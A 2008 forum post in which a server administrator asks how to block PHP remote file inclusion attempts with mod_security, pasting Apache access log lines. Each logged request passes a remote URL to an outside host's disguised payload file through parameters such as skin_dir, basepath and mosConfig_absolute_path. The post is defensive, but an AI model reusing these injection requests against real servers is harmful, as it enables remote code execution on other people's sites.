Anybody know how to block this specific PHP Inject attack using Mod_Security ?

smksa

Member
Aug 1, 2006
21
0
151
Hi,

I would like to request an assistant.

Anybody know how to block the following "WEB-PHP remote include path" attack using mod_security.

I have tried using Default Mod_Securty and also Mod_security from
http://www.timmit.nl/modsec2.user.conf.

But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server. :confused:

The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.


=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=viewtopic&topic=813&=&newlang=deu//phpopenchat/contrib/yabbse/poc.php%3fsourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My_eGallery/public/displayCategory.php%3fbasepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -

====================================



Appreciates if anybody can help to stop this attack.

Thank you,

Regards,
Sham